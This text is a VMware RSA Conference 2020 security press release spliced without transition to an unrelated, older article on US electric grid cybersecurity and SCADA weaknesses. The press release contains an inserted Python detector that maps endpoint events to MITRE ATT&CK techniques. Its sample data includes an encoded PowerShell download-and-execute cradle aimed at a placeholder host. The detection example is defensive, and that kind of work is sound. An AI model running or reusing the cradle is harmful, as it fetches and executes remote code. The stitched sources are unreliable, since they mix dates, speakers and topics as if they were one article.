VMware, Inc., an innovator in enterprise software, announces new innovations to advance the company’s strategy to make security intrinsic to the digital enterprise. Intrinsic security makes protecting critical applications and data more automated, proactive and pervasive across the entire distributed enterprise. The announcements, made at RSA Conference 2020, include:

- New VMware Advanced Security for Cloud Foundation, which will enable customers to replace legacy security solutions and deliver unified protection across private and public clouds
- Advancements to the VMware Carbon Black Cloud, which include automated correlation with the MITRE ATT&CK framework and upcoming prevention coverage for Linux machines
- New VMware Secure State auto-remediation capabilities to automate actions across cloud environments and proactively reduce risk

New Approach To Cybersecurity

VMware’s Sanjay Poonen will deliver a keynote address, ‘Rethink the Way You Secure Your Organisation with Intrinsic Security,’ which will discuss how making security intrinsic can unlock new advantages and make life easier for security practitioners.

“There has never been a more challenging and exciting time in security,” said Sanjay Poonen, chief operating officer, customer operations, VMware. “Attacker sophistication, security threats, breaches, and exploits are becoming more prevalent with no end in sight. And with cloud, new applications, pervasive mobility, IoT, and data at the edge, the problem is only getting harder to solve.
There must be a new approach to cybersecurity – one that is built-in, unified and context-centric.”

“We believe the best strategy and approach is to make security intrinsic, enabling organisations to leverage their infrastructure and its unique capabilities across any app, any cloud and any device to better secure the world’s digital infrastructure – from networks, to endpoints, to workloads, to identities, to clouds.”

Delivering best-in-class financial services

“Our members rely on us to deliver best-in-class financial services,” said Mark Fournier, Systems Architect for the U.S. Senate Federal Credit Union. “VMware has put our team in a position to deliver consistent innovation, evolve our digital transformation and keep our data better secured amidst an attack landscape that’s constantly evolving. VMware’s ability to deliver and help secure our digital infrastructure gives us the confidence that we’re staying ahead of the latest threats in an environment where cybersecurity is built into the fabric of our enterprise, not just bolted on.”

Single point of compromise

Data breaches are increasingly devastating, often wiping out billions in market capitalisation and costing public company CEOs their jobs. Damage rarely results from a single compromised server. It results from attackers moving laterally (East-West) through the datacentre from a single point of compromise, often for months, as they locate, harvest and exfiltrate sensitive data. Most security professionals know this, but struggle to adequately protect their data centres.
A survey commissioned by VMware and conducted by Forrester Consulting shows that 75 percent of respondents depend on perimeter firewalls. However, East-West security controls need to be different from those for traditional perimeter (North-South) security: 73 percent of respondents believe their existing East-West traffic is not adequately protected.

Protecting data centre workloads

VMware is specifically addressing the internal data centre security challenge with the new VMware Advanced Security for Cloud Foundation, which will include VMware Carbon Black technology, VMware NSX Advanced Load Balancer with Web Application Firewall capabilities and VMware NSX Distributed IDS/IPS. Each one is purpose-built for the data centre, and together they deliver a unique and more comprehensive data centre security solution. Also, all three will tightly integrate into VMware vSphere, the industry standard for data centre workloads, enabling security to follow workloads wherever they go through their entire life.

Data centre security starts with a strong foundation: properly protecting data centre workloads. VMware Carbon Black technology protects workloads with Real-time Workload Audit/Remediation, Next-Generation Antivirus (NGAV) and Endpoint Detection & Response (EDR).

Hardware-based solutions

VMware Carbon Black will be tightly integrated with VMware vSphere to yield an ‘agentless’ solution, eliminating the need to insert antivirus and other agents. Instead, endpoint telemetry will be managed and gathered via built-in sensors protected by the hypervisor. This also means that, unlike agent-based solutions, the hypervisor will be able to detect if an attacker attempts to gain root access and tamper with the VMware Carbon Black technology, all from a separate trust domain.
The web server is the ‘front door’ of the data centre, and NSX Advanced Load Balancer / Web Application Firewall safeguards this frequent point of attack. Often customers using hardware-based solutions with fixed capacity will turn off security filtering under heavy loads, leaving critical servers vulnerable. The unique, scale-out software architecture of the NSX Web Application Firewall helps confirm web servers have enough computation capacity for maximum security filtering even under peak loads.

Traditional perimeter security products

The NSX Web Application Firewall uses a rich understanding of applications, automated learning, and app-specific rules to provide strong security with lower false positives. Behind the web tier, micro-segmentation and in-band East-West firewalling help prevent lateral movement of attackers. The VMware NSX Distributed IDS/IPS, a new capability of the VMware NSX Service-defined Firewall, will provide intrusion detection on the many different services that make up an application, making it easier to get deep visibility. The distributed architecture of NSX Distributed IDS/IPS will enable advanced filtering to be applied to every hop of the application, significantly reducing the blind spots created when using traditional perimeter security products. Policies will be automatically generated and enforced on an application-specific basis, thereby lowering false positives.

Discovering potential threats

VMware has introduced automated correlation with MITRE ATT&CK framework Technique IDs (TIDs), a list of common tactics, techniques, and procedures (TTPs), built into the VMware Carbon Black Cloud. Using MITRE’s ATT&CK framework, customers can begin searching for specific TTPs based on MITRE ATT&CK techniques within the VMware Carbon Black Cloud to discover potential threats and identify areas of improvement in their security posture.
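The ATT&CK correlation described above, as an added example that is not part of the VMware announcement or of the Carbon Black product: a small Python detector that first recovers the script text the interpreter would actually run (the same de-obfuscated content that the AMSI integration in the next paragraph exposes), then tags each endpoint event with the MITRE technique IDs its content matches. The rule patterns, host names, URLs and sample events are constructed for illustration; only the technique IDs are real MITRE ATT&CK identifiers.

```python
import base64
import re

# Detection rules keyed by MITRE ATT&CK technique ID. They run over the
# de-obfuscated script text (what an AMSI hook hands to the scanner), not the
# raw command line. The patterns are this example's own; only the IDs are MITRE's.
RULES = {
    "T1059.001": re.compile(r"\b(Invoke-Expression|IEX)\b", re.IGNORECASE),
    "T1105": re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest)\b", re.IGNORECASE),
}
ENCODED_FLAG = re.compile(r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return (script_text, was_encoded). Mimics the interpreter's own
    base64/UTF-16LE decoding of -EncodedCommand, so the text we scan is what
    actually executes rather than an opaque blob; plain command lines pass through."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline, False
    return base64.b64decode(m.group(1)).decode("utf-16-le"), True


def match_techniques(script_text, was_encoded):
    """Map one decoded script to the ATT&CK technique IDs it exhibits. Base64
    wrapping is itself T1027 (Obfuscated Files or Information); the content
    rules add T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer)."""
    hits = {tid for tid, rx in RULES.items() if rx.search(script_text)}
    if was_encoded:
        hits.add("T1027")
    return sorted(hits)


def analyze(events):
    """Decode every event, apply the rules and return only the events that matched."""
    findings = []
    for ev in events:
        text, encoded = decode_encoded_command(ev["cmdline"])
        tids = match_techniques(text, encoded)
        if tids:
            findings.append({"host": ev["host"], "decoded": text, "techniques": tids})
    return findings


def _b64_utf16(script):
    """Build the -EncodedCommand form of a script, as PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real Carbon Black or AMSI data). ws-01 hides a
# download cradle behind -enc, ws-02 is routine admin use, and ws-03 fetches a
# file in clear text and should map to T1105 only.
SAMPLE_EVENTS = [
    {"host": "ws-01", "cmdline": "powershell.exe -NoP -enc " + _b64_utf16(
        "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')")},
    {"host": "ws-02", "cmdline": 'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending"'},
    {"host": "ws-03", "cmdline": 'powershell.exe -Command "Invoke-WebRequest -Uri '
                                 'https://updates.example.invalid/kb.cab -OutFile C:\\Temp\\kb.cab"'},
]
```

Running `analyze(SAMPLE_EVENTS)` flags ws-01 with T1027, T1059.001 and T1105 and ws-03 with T1105 only; without the decoding step the ws-01 command line would match nothing, which is the visibility gap the AMSI integration closes.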
VMware Carbon Black has also integrated with the Microsoft Windows Antimalware Scan Interface (AMSI) to provide additional visibility by decoding obfuscated commands. Using the integration, customers will be able to see the exact content executed by script interpreters, such as PowerShell. Customers will also be able to search across their continuously collected endpoint activity data and create custom detections based on AMSI-related script content.

Endpoint prevention solutions

Finally, VMware Carbon Black will be adding malware prevention capabilities for Linux machines. This will empower customers to migrate away from other endpoint prevention solutions specific to Linux and consolidate their security programs. This addition to the VMware Carbon Black Cloud platform means customers will have the option of comprehensive security coverage across all major operating systems (Windows, Mac, and Linux).

With VMware Secure State’s real-time detection and remediation capabilities, customers can now close the loop on cloud security and compliance to mitigate risks proactively. VMware Secure State is adding a new, flexible remediation framework to help customers automate actions across multicloud environments. Currently in beta, this solution is designed to help cloud security teams collaborate with DevOps teams and gain trust as they gradually scale best practices.

Maintaining centralised visibility

The service provides pre-defined, out-of-the-box actions or the ability to create new, custom actions as code. All actions can be targeted to selectively remediate resources based on conditions such as cloud accounts, regions or resource tags. Security teams will also get comprehensive capabilities for managing overall cloud risk.
To address existing misconfigurations, they can either bulk remediate violations themselves or publish actions to delegate decisions to DevOps teams. To prevent new misconfigurations, they can build guardrails that auto-remediate violations at real-time speed. With an extensible policy-as-code approach, users can programmatically execute all remediations as code using the API and integrate them within the CI/CD pipeline. No matter how actions are triggered, customers maintain centralised visibility into remediation progress and changes to cloud resources.

Hosting two breakout sessions

The new portfolio offerings, product demos and more will be on display this week at the RSA Conference in the Moscone North Expo, booth #6145. VMware Carbon Black will be in Moscone Expo North, booth #5873. In addition to Poonen’s keynote address on February 26, VMware will host two breakout sessions during the conference. VMware’s SVP and GM of Network Security, Tom Gillis, will deliver ‘Unshackle Legacy Security Restrictions for 2020 and Beyond.’ VMware Carbon Black’s Cybersecurity Strategist, Rick McElroy, and Senior Threat Researcher, Greg Foss, will deliver ‘2020 ATT&CK Vision: Correlating TTPs to Disrupt Advanced Cyber Attacks.’
The electric power industry works with several federal agencies, including the Federal Energy Regulatory Commission (FERC), the Department of Homeland Security (DHS), and the Department of Energy (DOE), to improve sector-wide resilience to cyber threats. The industry also collaborates with the National Institute of Standards and Technology (NIST), the North American Electric Reliability Corporation (NERC), and federal intelligence and law enforcement agencies to strengthen its cyber security capabilities.

Are the standards anywhere close enough to actually be of service? We shall soon see, because last November CIP-014-1 was approved. It is the Physical Security Reliability Standard, developed by the North American Electric Reliability Corporation and approved by the U.S. Federal Energy Regulatory Commission. In December, the House of Representatives unanimously approved H.R. 3410, the Critical Infrastructure Protection Act (CIPA). This is the first time in four years that Congress has acted to begin to protect the nation’s electrical grid, and it comes on the heels of CIP-014-1’s approval.

Aim of the new bill

The bill enjoys strong bipartisan support, but it remains to be seen whether it will become law. It has been read in the Senate and referred to the Committee on Homeland Security and Governmental Affairs. Its purpose is to see that DHS:

- Include in national planning scenarios the threat of electromagnetic pulse (EMP), which would entail educating the owners and operators of critical infrastructure, as well as emergency planners and emergency responders at all levels of government, about the threat of EMP events;
- Engage in research and development aimed at mitigating the consequences of naturally occurring or man-caused EMP events;
- Produce a comprehensive plan to protect and prepare the critical infrastructure of the American homeland against EMP events.
FERC’s standard CIP-014-1 has six requirements, including:

- Performing risk assessments periodically to identify weak transmission stations and substations;
- The transmission owner must modify trouble spots accordingly and implement procedures for protecting sensitive or confidential information;
- Transmission owners must let operators know there are issues so they can address them;
- Owners and transmission operators must conduct an evaluation of the potential threats and vulnerabilities of a physical attack on each of its respective transmission stations, transmission substations, and primary control centers identified as critical under the first requirement;
- Utilities must devise physical security plans for each of their respective transmission stations, transmission substations, and their primary control center;
- Finally, they must have an unaffiliated third party with appropriate experience review the evaluation and security plan and then respond to the recommendations.

However, Todd Borandi, an industry veteran and information security architect, sees these regulations as a day late and a dollar short. He credits hackers for today’s push for regulations “because several groups made it a public point to demonstrate how easy it is to access sensitive systems and steal data, so the outcry from the private, public and even the government demanded regulations causing this whole cycle to start all over again.”

The FERC standard became effective, according to the Federal Register, on January 26, 2015. It remains to be seen whether or not the boxes get checked in lieu of an improvement in physical security.

Wind - The saviour?

Ironically, what might be of more help is a very simple solution: wind.
LogRhythm’s Greg Foss says “Wind could be the saviour” because the Department of Energy is working on outputting windmill energy into batteries. Foss is senior security research engineer for Boulder, Colo.-based LogRhythm, a security intelligence firm. One option is to upgrade equipment, but as we’ve discovered that demands a huge money outlay, and as Foss says, “Right now, utilities have no real need to do this even though there have been 97 attacks against the grid so far this year.”

Foss’ company creates honeypots, which are traps for hackers. “Once they get in,” he says, “we can track them and learn.” He says that a so-called ‘Conpot’ is under development. It would simulate SCADA by running, for example, a gas main, a utility box or a water-heating system, which is a prime target for hackers who wish to fudge temperature readings and make things look cooler than they really are. His best advice is “Hire the right people, train them well and give them the tools to build solutions. Security isn’t that easy to learn and they have to have the tools to succeed.” His company’s mantra is “not if, when,” and those words should resound loudly at all utility firms.
According to the Bipartisan Policy Center, the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), which is part of the U.S. Department of Homeland Security, reported responding to 198 cyber incidents in fiscal year 2012 across all critical infrastructure sectors. Forty-one percent of these incidents involved the energy sector, particularly electricity, according to a February 2014 report. Considering the enormity of the system, it soon becomes clear that 198 events is the very tip of an enormous iceberg.

Greg Foss, senior security research engineer for Boulder, Colo.-based LogRhythm, a security intelligence firm, says “an average breach lasts 480 days before a company knows they’ve been attacked.” He also says that most utilities are slow to address the problem because of upgrade costs, and that “some of them are still running Windows 98.”

There is much talk about creating a “smart grid,” which, according to the Department of Energy, means “computerising” the electric utility grid and includes adding two-way digital communication technology to devices associated with it. As DoE says: “Each device on the network can be given sensors to gather data (power meters, voltage sensors, fault detectors, etc.), plus two-way digital communication between the device in the field and the utility’s network operations center.” A key feature of the smart grid is automation technology that lets the utility adjust and control each individual device or millions of devices from a central location. Therein is the problem.
Much of the equipment in the “smart grid,” including transformers and generators, is operated by SCADA (supervisory control and data acquisition), a system that operates with coded signals running over communication channels. The whole concept of a SCADA system is that it provides a way to monitor a number of items within one facility, and it has worked so well that many companies run everything into a computer to control all facets of operation. “SCADA monitors devices on the grid many times per second and was never intended or designed to have virus protection or security protocols,” says Dave Hunt, an independent homeland security consultant and a founding member of the National InfraGard Electromagnetic Pulse special interest group. In fact, continuous monitoring makes it virtually impossible for a SCADA system to validate a security protocol. Adding to the misery is that an evildoer can purchase a SCADA attack for about $500, not to mention that the systems were designed by engineers, not computer people, so they don’t necessarily communicate well.

These systems are called embedded systems, and the bad guys are fighting them hard. According to Daniel Geer, Sc.D, chief technical officer of @Stake, in Cambridge, Mass., “Cyber smart bombs are what nations are working on.” These bombs are designed to attack embedded systems like SCADA. He strongly feels that “Embedded systems either need to have a remote management interface or they need to have a finite lifetime. They cannot be immortal and unfixable because to do so is to guarantee that something bad will happen.” But to change them would cost the utilities more money.

Todd Borandi, CISSP, an industry veteran and information security architect, says, “The root of all security issues is the vendor supplying the hardware and software. This equipment is provided by a small group of companies that experience little to no pressure to provide specialized secure software or hardware, which is expected to last more than a decade with little chance of an update. Many of these devices can now be rebooted and even overwritten from anywhere and by anyone.” He adds that “Another important issue is the idea that regulatory compliance is a sustainable solution to cyber security challenges. Regulatory laws are often slow to implementation and provide little meaningful guidance or enforcement in a dynamic field like technology.”